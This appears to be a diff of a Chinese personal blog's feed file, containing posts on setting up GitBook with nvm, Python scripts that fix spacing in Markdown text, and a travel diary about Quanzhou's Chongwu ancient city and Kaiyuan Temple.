    Expandable blocks are helpful in condensing what could otherwise be a lengthy paragraph. They are also great in step-by-step guides and FAQs.

    ​可扩展块有助于压缩原本可能很长的段落。它们在分步指南和常见问题解答方面也很出色。

    #### Drawings
    Embedded content

    GitBook supports thousands of embedded websites out-of-the-box, simply by pasting their links. Feel free to check out which ones are supported natively.

    ​GitBook 支持成千上万的嵌入式网站,只需粘贴链接即可。请随时查看哪些是本机支持的。

    OpenAPI

    You can sync GitBook pages with an OpenAPI or Swagger file or a URL to include auto-generated API methods in your documentation.

    ​您可以将 GitBook 页面与 OpenAPI 或 Swagger 文件或 URL 同步,以便在文档中包含自动生成的 API 方法。

    OpenAPI block

    GitBook’s OpenAPI block is powered by Scalar, so you can test your APIs directly from your docs.

    ​GitBook 的 OpenAPI 块由 Scalar 提供支持,因此您可以直接从文档中测试您的API。

    Integrations

    GitBook integrations allow you to connect your GitBook spaces to some of your favorite platforms and services. You can install integrations into your GitBook page from the Integrations menu in the top left.

    ​GitBook 集成允许您将 GitBook 空间连接到您最喜欢的一些平台和服务。您可以从左上角的集成菜单将集成安装到 GitBook 页面中。

    avif

    ]]>
    + 资源

    安装

    ​有两种方式可以配置 GitBook:

    ​本地版:

    ​网页版:

    规则

    开始

    本地版

    安装 nvm

    ​这个 GitBook 的本地版年久失修很久了,用新的 Node.js 会出现兼容问题……得整一个 nvm。

    ​把原有的 Node.js 卸了,装 nvm。

    ​命令行查看 nvm 版本:

    1
    nvm version
    1
    1.1.12

    安装 npm

    找到 nvm 安装的路径,修改 settings.txt 下的内容以配置镜像:

    1
    2
    3
    4
    root: C:\Users\XXX\AppData\Roaming\nvm
    path: C:\Program Files\nodejs
    node_mirror: https://npmmirror.com/mirrors/node/
    npm_mirror: https://npmmirror.com/mirrors/node/

    ​这边还是下载失败,只好像安装 pytorch 一样离线安装了……

    ​从 Node.js 中文网 — 下载 Node.js® 想要版本的 预构建二进制文件,解压出来并改名:

    webp

    ​以此法装一个最新的 Node.js(v22.11.0) 和支持 GitBook 的 Node.js(v10.24.1)。命令行查看是否安装成功:

    1
    nvm list
    1
    2
    22.11.0
    10.24.1

    ​激活!

    1
    nvm use 10.24.1

    ​查看下载源:

    1
    npm config get registry
    1
    https://registry.npmjs.org/

    ​切换镜像:

    1
    npm config set registry https://registry.npmmirror.com

    安装 GitBook

    ​安装 GitBook CLI:

    1
    npm install -g gitbook-cli

    ​查看安装情况:

    1
    gitbook -V
    1
    2
    3
    4
    5
    6
    7
    CLI version: 2.3.2
    Installing GitBook 3.2.3
    gitbook@3.2.3 C:\Users\19048\AppData\Local\Temp\tmp-44796f14sHIZaeO0a\node_modules\gitbook
    ├── escape-html@1.0.3
    ...
    └── npm@3.9.2
    GitBook version: 3.2.3

    ​在项目文件夹下初始化 GitBook:

    1
    gitbook init
    1
    2
    3
    4
    warn: no summary file in this book
    info: create README.md
    info: create SUMMARY.md
    info: initialization is finished

    ​查看帮助:

    1
    gitbook help
    命令描述选项/参数
    build [book] [output]构建一本书–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    --format: 构建格式(默认是 website,可选:website, json, ebook)
    --[no-]timing: 打印调试信息(默认是 false)
    serve [book] [output]将书籍作为网站提供测试服务–port: 服务器监听的端口(默认是 4000)
    --lrport: 直播重载服务器的端口(默认是 35729)
    --[no-]watch: 启用文件监视和实时重载(默认是 true)
    --[no-]live: 启用实时重载(默认是 true)
    --[no-]open: 启用在浏览器中打开书籍(默认是 false)
    --browser: 指定用于打开书籍的浏览器(默认是空)
    --log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    --format: 构建格式(默认是 website,可选:website, json, ebook)
    install [book]安装所有插件的依赖–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    parse [book]解析并打印书籍的调试信息–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    init [book]设置并创建章节文件–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    pdf [book] [output]将书籍构建成电子书文件–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    epub [book] [output]将书籍构建成电子书文件–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    mobi [book] [output]将书籍构建成电子书文件–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)

    ​编译:

    1
    gitbook build

    ​得到网页文件:

    演示

    网页版

    ​按 GitBook 步骤走就行。得到一个域:Welcome | Zi-Zi’s Jounery

    ​使用 Edit in change requset 编辑,使用 Merge 编译。

    说明(网页版)

    Welcome

    Welcome to the GitBook Starter Template! Here you’ll get an overview of all the amazing features GitBook offers to help you build beautiful, interactive documentation.

    ​欢迎使用 GitBook 入门模板!在这里,您将获得 GitBook 提供的所有惊人功能的概述,以帮助您构建美观、交互式的文档。

    You’ll see some of the best parts of GitBook in action — and find help on how you can turn this template into your own.

    ​您将看到 GitBook 的一些最佳部分正在发挥作用,并找到如何将此模板转化为自己的帮助。

    Getting Started

    Quickstart

    Beautiful documentation starts with the content you create — and GitBook makes it easy to get started with any pre-existing content.

    ​漂亮的文档从你创建的内容开始——GitBook 让你很容易开始使用任何预先存在的内容。

    Import

    GitBook supports importing content from many popular writing tools and formats. If your content already exists, you can upload a file or group of files to be imported.

    ​GitBook 支持从许多流行的写作工具和格式导入内容。如果您的内容已经存在,您可以上传一个或一组要导入的文件。

    png

    Sync a repository

    GitBook also allows you to set up a bi-directional sync with an existing repository on GitHub or GitLab. Setting up Git Sync allows you and your team to write content in GitBook or in code, and never have to worry about your content becoming out of sync.

    ​GitBook 还允许您与 GitHub 或 GitLab 上的现有存储库设置双向同步。设置Git Sync 允许您和您的团队在 GitBook 或代码中编写内容,而无需担心您的内容会不同步。

    Publish your docs

    Once you’ve finished writing, editing, or importing your content, you can publish your work to the web as a docs site. Once published, your site will be accessible online only to your selected audience.

    ​一旦你完成了写作、编辑或导入内容,你就可以将你的作品作为文档网站发布到网上。一旦发布,您的网站将仅对选定的受众在线访问。

    You can publish your site and find related settings from your docs site’s homepage.

    ​您可以在文档网站的主页上发布您的网站并查找相关设置。

    webp

    Basics

    Editor

    GitBook has a powerful block-based editor that allows you to seamlessly create, update, and enhance your content.

    ​GitBook 有一个强大的基于块的编辑器,可以让你无缝地创建、更新和增强你的内容。

    avif

    Writing content

    GitBook offers a range of block types for you to add to your content inline — from simple text and tables, to code blocks and more. These elements will make your pages more useful to readers, and offer extra information and context.

    ​GitBook 提供了一系列块类型供您内联添加到内容中——从简单的文本和表格到代码块等等。这些元素将使您的页面对读者更有用,并提供额外的信息和背景。

    Either start typing below, or press / to see a list of the blocks you can insert into your page.

    ​请在下面开始键入,或按 / 查看可以插入页面的块列表。

    Markdown

    GitBook supports many different types of content, and is backed by Markdown — meaning you can copy and paste any existing Markdown files directly into the editor!

    ​GitBook 支持许多不同类型的内容,并由 Markdown 支持——这意味着您可以将任何现有的 Markdown 文件直接复制粘贴到编辑器中!

    webp

    Feel free to test it out and copy the Markdown below by hovering over the code block in the upper right, and pasting into a new line underneath.

    ​您可以随意测试它,并将鼠标悬停在右上角的代码块上,然后粘贴到下面的新行中,复制下面的 Markdown。

    1
    2
    3
    4
    5
    6
    7
    8
    # Heading

    This is some paragraph text, with a [link](https://docs.gitbook.com) to our docs.

    ## Heading 2
    - Point 1
    - Point 2
    - Point 3

    ​If you have multiple files, GitBook makes it easy to import full repositories too — allowing you to keep your GitBook content in sync.

    ​如果你有多个文件,GitBook 也可以轻松导入完整的存储库,让你的 GitBook 内容保持同步。

    Images & media

    GitBook allows you to add images and media easily to your docs. Simply drag a file into the editor, or use the file manager in the upper right corner to upload multiple images at once.

    ​GitBook 允许您轻松地将图像和媒体添加到文档中。只需将文件拖动到编辑器中,或使用右上角的文件管理器一次上传多张图像。

    avif

    You can also add images simply by copying and pasting them directly into the editor — and GitBook will automatically add it to your file manager.

    ​您还可以通过将图像直接复制并粘贴到编辑器中来添加图像,GitBook 会自动将其添加到您的文件管理器中。

    Interactive blocks

    In addition to the default Markdown you can write, GitBook has a number of out-of-the-box interactive blocks you can use. You can find interactive blocks by pressing / from within the editor.

    ​除了你可以编写的默认 Markdown 之外,GitBook 还有许多你可以使用的开箱即用的交互式块。您可以通过在编辑器中按 / 找到交互式块。

    avif

    Tabs

    Each tab is like a mini page — it can contain multiple other blocks, of any type. So you can add code blocks, images, integration blocks and more to individual tabs in the same tab block.

    ​每个选项卡都像一个迷你页面——它可以包含多个其他任何类型的块。因此,您可以将代码块、图像、集成块等添加到同一选项卡块中的各个选项卡中。

    Add images, embedded content, code blocks, and more.

    ​添加图像、嵌入式内容、代码块等。

    1
    2
    3
    const handleFetchEvent = async (request, context) => {
    return new Response({message: "Hello World"});
    };

    Expandable sections

    Click me to expand

    Expandable blocks are helpful in condensing what could otherwise be a lengthy paragraph. They are also great in step-by-step guides and FAQs.

    ​可扩展块有助于压缩原本可能很长的段落。它们在分步指南和常见问题解答方面也很出色。

    #### Drawings
    Embedded content

    GitBook supports thousands of embedded websites out-of-the-box, simply by pasting their links. Feel free to check out which ones are supported natively.

    ​GitBook 支持成千上万的嵌入式网站,只需粘贴链接即可。请随时查看哪些是本机支持的。

    OpenAPI

    You can sync GitBook pages with an OpenAPI or Swagger file or a URL to include auto-generated API methods in your documentation.

    ​您可以将 GitBook 页面与 OpenAPI 或 Swagger 文件或 URL 同步,以便在文档中包含自动生成的 API 方法。

    OpenAPI block

    GitBook’s OpenAPI block is powered by Scalar, so you can test your APIs directly from your docs.

    ​GitBook 的 OpenAPI 块由 Scalar 提供支持,因此您可以直接从文档中测试您的API。

    Integrations

    GitBook integrations allow you to connect your GitBook spaces to some of your favorite platforms and services. You can install integrations into your GitBook page from the Integrations menu in the top left.

    ​GitBook 集成允许您将 GitBook 空间连接到您最喜欢的一些平台和服务。您可以从左上角的集成菜单将集成安装到 GitBook 页面中。

    avif

    ]]>
    @@ -330,7 +330,7 @@ /posts/Diary-%E5%95%8A%EF%BC%8110%20%E6%9C%88%EF%BC%81/ -
    ]]> +
    ]]>
    @@ -357,7 +357,7 @@ /posts/Web-%E4%B8%AD%E6%96%87%E6%96%87%E6%A1%88%E6%8E%92%E7%89%88%E6%8C%87%E5%8C%97%EF%BC%88%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87%E7%89%88%EF%BC%89/ - 参考

    正文

    ​关于中英文之间的空格问题,已经争议良久,一部分人认为:中英文之间需要加空格,这是书面语的语法问题,就像是英文句子中,两个英文单词之间需要加空格一样。当然,也有人认为中文和英文之间不需要增加额外的空格,空格是为了增加区分度,而中文和英文本身就有自然的区分。中文和英文之间的间距,应该交给排版工具完成,作者不应该增加额外的干预。

    ​尽管我目前有在中英文之间加空格的习惯,但是总有疏忽的时候,对于从其他地方拷贝过来的文本还要手动修正格式真是太麻烦了!于是乎,我决定使用 python 遍历我的 .md 文章实现如下的排版规则

    1. 中英文之间需要增加空格
    2. 中文与数字之间需要增加空格
    3. 中文与数字之间需要增加空格
    4. 数字与单位之间无需增加空格
    5. 全角标点与其他字符之间不加空格
    import re

    def fix_spacing_rules(line):
    # 1. 中英文之间需要增加空格
    line = re.sub(r'([\u4e00-\u9fff])([a-zA-Z])', r'\1 \2', line)
    line = re.sub(r'([a-zA-Z])([\u4e00-\u9fff])', r'\1 \2', line)

    # 2. 中文与数字之间需要增加空格
    line = re.sub(r'([\u4e00-\u9fff])([0-9])', r'\1 \2', line)
    line = re.sub(r'([0-9])([\u4e00-\u9fff])', r'\1 \2', line)

    # 4. 数字与单位之间无需增加空格
    units = ['%', '°C', 'km', 'm', 'kg', 'g', 'cm', 'mm', 'L', 'ml', 'h', 'min', 's']
    for unit in units:
    line = re.sub(r'([0-9])\s+({})'.format(unit), r'\1\2', line)

    # 5. 全角标点与其他字符之间不加空格
    line = re.sub(r'([\u3000-\u303F\uFF00-\uFFEF])\s+', r'\1', line)
    line = re.sub(r'\s+([\u3000-\u303F\uFF00-\uFFEF])', r'\1', line)

    return line

    def process_md_file(file_path):
    # 读取单个 .md 文件
    with open(file_path, 'r', encoding='utf-8') as file:
    lines = file.readlines()

    updated_lines = []
    inside_yaml_header = False

    for line in lines:
    # 跳过 YAML 头文件部分(即以 "---" 包围的部分)
    if line.strip() == "---":
    inside_yaml_header = not inside_yaml_header
    updated_lines.append(line)
    elif inside_yaml_header:
    # 如果在 YAML 头文件部分,原样添加
    updated_lines.append(line)
    else:
    # 处理正文内容,保留行尾的换行符
    updated_lines.append(fix_spacing_rules(line.rstrip()) + line[len(line.rstrip()):])

    # 写回文件(如果内容有更新)
    if lines != updated_lines:
    with open(file_path, 'w', encoding='utf-8') as file:
    file.writelines(updated_lines)
    print(f"Processed: {file_path}")

    # 指定你要处理的 .md 文件路径
    file_path = "your_file_path_here.md"
    process_md_file(file_path)
    import os
    import re

    def fix_spacing_rules(line):
    # 1. 中英文之间需要增加空格
    line = re.sub(r'([\u4e00-\u9fff])([a-zA-Z])', r'\1 \2', line)
    line = re.sub(r'([a-zA-Z])([\u4e00-\u9fff])', r'\1 \2', line)

    # 2. 中文与数字之间需要增加空格
    line = re.sub(r'([\u4e00-\u9fff])([0-9])', r'\1 \2', line)
    line = re.sub(r'([0-9])([\u4e00-\u9fff])', r'\1 \2', line)

    # 4. 数字与单位之间无需增加空格
    units = ['%', '°C', 'km', 'm', 'kg', 'g', 'cm', 'mm', 'L', 'ml', 'h', 'min', 's']
    for unit in units:
    line = re.sub(r'([0-9])\s+({})'.format(unit), r'\1\2', line)

    # 5. 全角标点与其他字符之间不加空格
    line = re.sub(r'([\u3000-\u303F\uFF00-\uFFEF])\s+', r'\1', line)
    line = re.sub(r'\s+([\u3000-\u303F\uFF00-\uFFEF])', r'\1', line)

    return line

    def process_md_files(directory):
    # 遍历文件夹中的所有 .md 文件
    for filename in os.listdir(directory):
    if filename.endswith(".md"):
    file_path = os.path.join(directory, filename)
    with open(file_path, 'r', encoding='utf-8') as file:
    lines = file.readlines()

    updated_lines = []
    inside_yaml_header = False

    for line in lines:
    # 跳过 YAML 头文件部分(即以 "---" 包围的部分)
    if line.strip() == "---":
    inside_yaml_header = not inside_yaml_header
    updated_lines.append(line)
    elif inside_yaml_header:
    # 如果在 YAML 头文件部分,原样添加
    updated_lines.append(line)
    else:
    # 处理正文内容,保留行尾的换行符
    updated_lines.append(fix_spacing_rules(line.rstrip()) + line[len(line.rstrip()):])

    # 如果内容有更新,则写回文件
    if lines != updated_lines:
    with open(file_path, 'w', encoding='utf-8') as file:
    file.writelines(updated_lines)
    print(f"Processed: {filename}")

    # 指定你要遍历的文件夹路径
    directory_path = "your_directory_path_here"
    process_md_files(directory_path)
    ]]>
    + 参考

    正文

    ​关于中英文之间的空格问题,已经争议良久,一部分人认为:中英文之间需要加空格,这是书面语的语法问题,就像是英文句子中,两个英文单词之间需要加空格一样。当然,也有人认为中文和英文之间不需要增加额外的空格,空格是为了增加区分度,而中文和英文本身就有自然的区分。中文和英文之间的间距,应该交给排版工具完成,作者不应该增加额外的干预。

    ​尽管我目前有在中英文之间加空格的习惯,但是总有疏忽的时候,对于从其他地方拷贝过来的文本还要手动修正格式真是太麻烦了!于是乎,我决定使用 python 遍历我的 .md 文章实现如下的排版规则

    1. 中英文之间需要增加空格
    2. 中文与数字之间需要增加空格
    3. 中文与数字之间需要增加空格
    4. 数字与单位之间无需增加空格
    5. 全角标点与其他字符之间不加空格
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    import re

    def fix_spacing_rules(line):
    # 1. 中英文之间需要增加空格
    line = re.sub(r'([\u4e00-\u9fff])([a-zA-Z])', r'\1 \2', line)
    line = re.sub(r'([a-zA-Z])([\u4e00-\u9fff])', r'\1 \2', line)

    # 2. 中文与数字之间需要增加空格
    line = re.sub(r'([\u4e00-\u9fff])([0-9])', r'\1 \2', line)
    line = re.sub(r'([0-9])([\u4e00-\u9fff])', r'\1 \2', line)

    # 4. 数字与单位之间无需增加空格
    units = ['%', '°C', 'km', 'm', 'kg', 'g', 'cm', 'mm', 'L', 'ml', 'h', 'min', 's']
    for unit in units:
    line = re.sub(r'([0-9])\s+({})'.format(unit), r'\1\2', line)

    # 5. 全角标点与其他字符之间不加空格
    line = re.sub(r'([\u3000-\u303F\uFF00-\uFFEF])\s+', r'\1', line)
    line = re.sub(r'\s+([\u3000-\u303F\uFF00-\uFFEF])', r'\1', line)

    return line

    def process_md_file(file_path):
    # 读取单个 .md 文件
    with open(file_path, 'r', encoding='utf-8') as file:
    lines = file.readlines()

    updated_lines = []
    inside_yaml_header = False

    for line in lines:
    # 跳过 YAML 头文件部分(即以 "---" 包围的部分)
    if line.strip() == "---":
    inside_yaml_header = not inside_yaml_header
    updated_lines.append(line)
    elif inside_yaml_header:
    # 如果在 YAML 头文件部分,原样添加
    updated_lines.append(line)
    else:
    # 处理正文内容,保留行尾的换行符
    updated_lines.append(fix_spacing_rules(line.rstrip()) + line[len(line.rstrip()):])

    # 写回文件(如果内容有更新)
    if lines != updated_lines:
    with open(file_path, 'w', encoding='utf-8') as file:
    file.writelines(updated_lines)
    print(f"Processed: {file_path}")

    # 指定你要处理的 .md 文件路径
    file_path = "your_file_path_here.md"
    process_md_file(file_path)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    import os
    import re

    def fix_spacing_rules(line):
    # 1. 中英文之间需要增加空格
    line = re.sub(r'([\u4e00-\u9fff])([a-zA-Z])', r'\1 \2', line)
    line = re.sub(r'([a-zA-Z])([\u4e00-\u9fff])', r'\1 \2', line)

    # 2. 中文与数字之间需要增加空格
    line = re.sub(r'([\u4e00-\u9fff])([0-9])', r'\1 \2', line)
    line = re.sub(r'([0-9])([\u4e00-\u9fff])', r'\1 \2', line)

    # 4. 数字与单位之间无需增加空格
    units = ['%', '°C', 'km', 'm', 'kg', 'g', 'cm', 'mm', 'L', 'ml', 'h', 'min', 's']
    for unit in units:
    line = re.sub(r'([0-9])\s+({})'.format(unit), r'\1\2', line)

    # 5. 全角标点与其他字符之间不加空格
    line = re.sub(r'([\u3000-\u303F\uFF00-\uFFEF])\s+', r'\1', line)
    line = re.sub(r'\s+([\u3000-\u303F\uFF00-\uFFEF])', r'\1', line)

    return line

    def process_md_files(directory):
    # 遍历文件夹中的所有 .md 文件
    for filename in os.listdir(directory):
    if filename.endswith(".md"):
    file_path = os.path.join(directory, filename)
    with open(file_path, 'r', encoding='utf-8') as file:
    lines = file.readlines()

    updated_lines = []
    inside_yaml_header = False

    for line in lines:
    # 跳过 YAML 头文件部分(即以 "---" 包围的部分)
    if line.strip() == "---":
    inside_yaml_header = not inside_yaml_header
    updated_lines.append(line)
    elif inside_yaml_header:
    # 如果在 YAML 头文件部分,原样添加
    updated_lines.append(line)
    else:
    # 处理正文内容,保留行尾的换行符
    updated_lines.append(fix_spacing_rules(line.rstrip()) + line[len(line.rstrip()):])

    # 如果内容有更新,则写回文件
    if lines != updated_lines:
    with open(file_path, 'w', encoding='utf-8') as file:
    file.writelines(updated_lines)
    print(f"Processed: {filename}")

    # 指定你要遍历的文件夹路径
    directory_path = "your_directory_path_here"
    process_md_files(directory_path)
    ]]>
    @@ -382,7 +382,7 @@ /posts/Course-%E6%B8%B8%E6%88%8F%E5%BF%83%E7%90%86%E5%AD%A6-%E4%B8%AD%E5%9B%BD%E4%BC%A0%E5%AA%92%E5%A4%A7%E5%AD%A6/ - 资源

    正文

    其他

    ​从官网获取的 PDF 中,不同行之间拷贝下来会留有空格,手动删起来真是太麻烦了!可用下面这段 python 代码一次性移除:

    import os
    import re

    def remove_spaces_between_chinese(text):
    # 正则表达式匹配中文字符之间的空格
    # 其中 u4e00-u9fff 是常见的中文字符 Unicode 范围
    pattern = re.compile(r'([\u4e00-\u9fff])\s+([\u4e00-\u9fff])')
    # 替换匹配到的空格
    return pattern.sub(r'\1\2', text)

    def process_md_files(directory):
    # 遍历文件夹中的所有 .md 文件
    for filename in os.listdir(directory):
    if filename.endswith(".md"):
    file_path = os.path.join(directory, filename)
    with open(file_path, 'r', encoding='utf-8') as file:
    content = file.read()

    # 删除中文字符之间的空格
    updated_content = remove_spaces_between_chinese(content)

    # 如果内容有更新,则写回文件
    if content != updated_content:
    with open(file_path, 'w', encoding='utf-8') as file:
    file.write(updated_content)
    print(f"Processed: {filename}")

    # 指定你要遍历的文件夹路径
    directory_path = "your_directory_path_here"
    process_md_files(directory_path)
    ]]>
    + 资源

    正文

    其他

    ​从官网获取的 PDF 中,不同行之间拷贝下来会留有空格,手动删起来真是太麻烦了!可用下面这段 python 代码一次性移除:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    import os
    import re

    def remove_spaces_between_chinese(text):
    # 正则表达式匹配中文字符之间的空格
    # 其中 u4e00-u9fff 是常见的中文字符 Unicode 范围
    pattern = re.compile(r'([\u4e00-\u9fff])\s+([\u4e00-\u9fff])')
    # 替换匹配到的空格
    return pattern.sub(r'\1\2', text)

    def process_md_files(directory):
    # 遍历文件夹中的所有 .md 文件
    for filename in os.listdir(directory):
    if filename.endswith(".md"):
    file_path = os.path.join(directory, filename)
    with open(file_path, 'r', encoding='utf-8') as file:
    content = file.read()

    # 删除中文字符之间的空格
    updated_content = remove_spaces_between_chinese(content)

    # 如果内容有更新,则写回文件
    if content != updated_content:
    with open(file_path, 'w', encoding='utf-8') as file:
    file.write(updated_content)
    print(f"Processed: {filename}")

    # 指定你要遍历的文件夹路径
    directory_path = "your_directory_path_here"
    process_md_files(directory_path)
    ]]>
    @@ -584,7 +584,7 @@ /posts/Paper-An%20Improved%20Formula%20Extraction%20Method%20of%20Printed%20Chinese%20Layouts%20Based%20on%20Connected%20Component%20Run-Length%20Feature/ -
    ]]>
    +
    ]]>
    @@ -663,7 +663,7 @@ /posts/Diary-%E5%95%8A%EF%BC%819%20%E6%9C%88%EF%BC%81/ -
    ]]>
    +
    ]]>
    @@ -771,7 +771,7 @@ /posts/Diary-%E7%BE%8E%E4%B8%BD%E6%B3%89%E5%B7%9E/ - 前言

    该滚蛋了!

    ​暑假就要结束了!这回依旧打算从厦门飞。

    ​身为一个福建人从来没去过美丽泉州,我觉得不行!所以半道拐一下。

    正文

    7.28

    07:23 祥谦

    雾蒙蒙

    ​再见福州!要去河北了,居然还少见地刮起了雾霾,让我提前适应新生活,真是太感人了😭!

    07:45 福清

    大往服务区

    ​歇一歇。

    08:13 莆田

    双桥

    ​少见的斜拉桥和拱桥修得那么近。

    08:49 驿坂

    下高速了!

    ​进入泉州界!

    09:40 崇武

    崇武古城

    ​美丽泉州第一站——惠安崇武古城!

    ​在惠安一路上可以看到很多石雕,佛像啊石狮子之类的,体态庞大,看上去十分壮观,但是忘记拍照了😅。

    09:48 城外

    惠安女造型

    09:53 城内

    城内
    城内

    城内

    ​惠安崇武古城风景区,位于福建省泉州市惠安县崇武半岛东端,地处福建省东南沿海的突出部、泉州湾和湄州湾之间、惠安县境东南 24 千米的崇武半岛南端,濒临台湾海峡。崇武古城始建于明洪武二十年(1387 年)。

    ​虽是风景区,但好像并不完全是,大部分还是当地居民的居住之处。

    09:58 大海

    大海
    大海

    水天一色

    ​啊,大海,美丽的海,迷人的海~(这个排版样式看上去两张图融为一体了)

    10:03 大炮

    开炮!

    ​这个炮感觉就像个玩具……

    10:09 庙宇

    关帝庙
    关帝庙 关帝庙 关帝庙 关帝庙

    关帝庙

    ​注重传统礼仪的泉州人将庙宇修得金碧辉煌!

    ​后来才知道,寺庙内最好不要拍照,那还是不拍了。

    10:17 歌词

    爱拼才会赢!

    ​闽南网红金曲——《爱拼才会赢》!

            

    ​闽南人爱拼才会赢!闽东人赖了又吧唧😖。

    10:18 古厝

    古厝
    古厝

    石头房子

    ​一点点嵩口古镇的味道。

    10:28 城隍

    城隍庙 城隍庙 城隍庙 城隍庙

    城隍庙

    10:35 小街

    挂着灯笼

    ​一点点小时候的勺园里的味道。

    10:45 海潮

    海潮庵
    海潮庵 海潮庵 海潮庵 海潮庵

    海潮庵

    12:13 洛阳

    ​午饭就在崇武古城外面吃了碗贡丸汤,¥20。崇武特色小吃崇武鱼卷!我是不爱吃的。

    通向洛阳

    ​西晋末年中原战乱不止,大批汉人士族南渡入闽避乱,部分辗转来此,沿江尤选洛阳江万安渡口周围安居。唐初和唐末,中原地区两次大的战乱再次使中原士族大量南迁,洛阳镇成了中原汉人南迁避难的主要聚集地之一。中原士族南迁于此后,因思念家乡而以“洛阳”命名此地。

    ​啊!洛阳!代表了当时西晋末年胡搞瞎搞,可怜的老百姓们翻山越岭来到了泉州,为了思念故土,便取此地名为“洛阳”。

    12:19 晋江

    晋江大桥

    ​晋江市因西晋永嘉年间,中原百姓避战乱南迁,据江居住而得名。

    ​啊!晋江!代表了当时西晋末年胡搞瞎搞,可怜的老百姓们翻山越岭来到了泉州,为了思念故土,便取此地名为“晋江”。

    湖南简称湘,省会长沙有湘江;江西简称赣,省会南昌有赣江;福建简称闽,省会福州有闽江;山西简称晋,省会泉州有晋江。

    12:20 泰禾

    泉州之眼

    ​为什么摩天轮又叫 XX 之眼呢?

    16:10 民宿

    可爱的玩偶

    ​到民宿洗个澡,睡一觉,节奏慢一点,要走了好像也没啥心情特种兵了😭。

    ​民宿里这么大的玩具熊该如何清洗呢?

    16:13 窗外

    这就是东西塔!

    ​民宿的窗外可以直接看到烂怂塔耶!

    17:20 鲤城

    鲤城
    鲤城

    鲤城

    ​傍晚开车进鲤城,连个停车的地方都没有……

    17:47 西湖

    西湖公园
    西湖公园
    西湖公园

    西湖公园

    ​最后开到西湖公园才总算找到个地停车。

    18:03 小吃

    小吃店

    ​泉州人连店里都要摆一个灶台拜一拜耶。

    福州肉饼

    ​跟冀大里的闽南扒饭一样,属于是本地人听都没听说过的东西。

    闽南特色小吃

    ​点了一份烧肉粽和肉燕王。为什么要叫肉燕王呢?做法与肉燕不同,里面的肉馅是打成泥再充填地瓜粉的。好像没有普通肉燕好吃😇。

    闽南特色四果汤

    ​点了一份四果汤,感觉就像学校里的水果酸奶捞,酸奶换成了蜜水。

    18:53 夜晚

    晚上的鲤城 晚上的鲤城 晚上的鲤城 晚上的鲤城

    晚上的鲤城

    ​直接 citywork 进鲤城走一走吧,人从众𠈌。

    19:16 西街

    西街
    西街

    西街

    ​接下来就该逛一逛人气最火爆的福州三坊七巷泉州西街了。

    19:32 双塔

    双塔
    双塔

    泉州开元寺塔

    ​晚上泉州开元寺就关门了。旅行者,前面的区域,明天再来探索吧!

    19:37 挂件

    钥匙挂件

    ​打卡一下伟哥的 QQ 头像。

    19:48 归程

    晚间西湖

    ​古城里面有个类似师大小白的东西,坐上去西湖公园下,一人¥2。然后今日行程就差不多了。

    7.29

    06:35 清晨

    可爱的玩偶

    ​第二天的行程开始咯!

    07:34 超雄

    牛逼的电瓶车

    ​前往古城中……

    ​美丽泉州哥的电瓶车真是太厉害了!直接插在机动车道上,还闯红灯😅。

    ​而福州的电瓶车经过多年来的严打,状况确实好了不少,有点能感受到当时福州政府的举措还是有些正确性的。

    ​也可能是泉州这个地方没有地铁,所以政府对电瓶车就睁一只眼闭一只眼了,主打一个权衡之术。

    08:03 早餐

    面线糊

    ​考研那段时间挺喜欢吃师大桃李园的一家面线糊 + 片皮鸭的,来泉州必须得尝尝。

    ​往面线糊里加了油条、醋肉、虾还有卤蛋。油条、醋肉和卤蛋跟面线糊相性挺好的,虾在里面都有点烂了😅。

    08:29 开元

    这就是开元寺!

    ​开冲!

    开元寺 开元寺 开元寺 开元寺 开元寺 开元寺

    莲花道场

    ​开元寺位于福建省泉州市鲤城区西街,是中国东南沿海重要的文物古迹,也是福建省内规模最大的佛教寺院。该寺始创于唐初垂拱二年(686 年),初名莲花道场,开元二十六年(738 年)更名开元寺,是宋元时期泉州规模最大、官方地位最突出的佛教寺院。现存主要庙宇系明、清两代修建,南北长 260 米,东西宽 300 米,占地面积 78000 平方米。

    ​里面有着许多虔诚的信徒。

    08:52 茶花

    出水茶花

    ​大早上暴雨初停。

    08:56 弘一

    弘一法师纪念馆

    ​李叔同(1880 年 10 月 23 日—1942 年 10 月 13 日),又名李息霜、李岸、李良,谱名文涛,幼名成蹊,学名广侯,字息霜,别号漱筒。
    ​李叔同是著名音乐家、美术教育家、书法家、戏剧活动家,是中国话剧的开拓者之一。他从日本留学归国后,担任过教师、编辑之职,后剃度为僧,法名演音,号弘一,晚号晚晴老人,后被人尊称为弘一法师。
    ​1913 年受聘为浙江两级师范学校(后改为浙江省立第一师范学校)音乐、图画教师。1915 年起兼任南京高等师范学校音乐、图画教师,并谱曲南京大学历史上第一首校歌。1942 年 10 月 13 日,弘一法师圆寂于泉州不二祠温陵养老院晚晴室。

    ​啊!长亭外,古道边。大名鼎鼎的弘一法师于泉州圆寂。

    09:08 猫咪

    橘猫

    ​猫咪猫咪!

    09:10 杂项

    石狮子
    石狮子
    开元寺塔
    开元寺塔
    石狮子
    石狮子

    开元寺核心!

    杂项 杂项 杂项 杂项 杂项

    杂项

    10:19 清源

    清源山登山处

    ​接下来就该去逛逛清源山了。

    10:28 老君

    直扑老君岩!

